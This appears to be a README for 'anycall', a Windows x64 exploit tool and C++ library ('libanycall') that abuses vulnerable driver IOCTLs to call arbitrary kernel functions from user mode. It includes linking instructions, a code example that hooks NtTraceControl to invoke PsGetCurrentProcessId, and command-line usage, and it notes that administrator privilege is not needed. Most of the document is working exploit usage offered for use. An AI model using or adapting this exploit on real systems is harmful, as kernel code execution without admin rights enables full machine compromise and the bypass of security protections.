x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration
Release 2.0 includes libanycall, a C++ static library for executing the anycall exploit.

To use it, link against libanycall64 and include the header:

```cpp
#pragma comment( lib, "libanycall64" )
#include "libanycall.h"
```

For example:
```cpp
#include <windows.h>
#include <cstdio>
#include <cstdint>
#include <cstdlib>
#include "libanycall.h"
#pragma comment( lib, "libanycall64" )

// Function-pointer type matching the kernel export we want to call.
using PsGetCurrentProcessId = HANDLE( __fastcall* )( void );

int main( const int argc, const char** argv, const char** envp )
{
    // Set up the hook on NtTraceControl, which is exported by both
    // ntdll.dll (user mode) and ntoskrnl (kernel mode).
    if ( !libanycall::init( "ntdll.dll", "NtTraceControl" ) )
    {
        printf( "[!] failed to init libanycall\n" );
        return EXIT_FAILURE;
    }

    // Invoke NT kernel APIs from user mode. PsGetCurrentProcessId returns a
    // HANDLE; the low 32 bits hold the process id, so the cast is intentional.
    const uint32_t process_id =
        ( uint32_t )ANYCALL_INVOKE( PsGetCurrentProcessId );
    printf( "PsGetCurrentProcessId returns %u\n", process_id );

    return EXIT_SUCCESS;
}
```
```
anycall64.exe [module name] [procedure name]
```

Administrator privilege is not required to run it.

The following arguments are supported:

- (optional) module name: the module that exports [procedure name], e.g. ntdll.dll
- (optional) procedure name: the function to hook, which is fetched from both ntoskrnl and [module name], e.g. NtTraceControl

If neither is specified, ntdll.dll and NtTraceControl are used.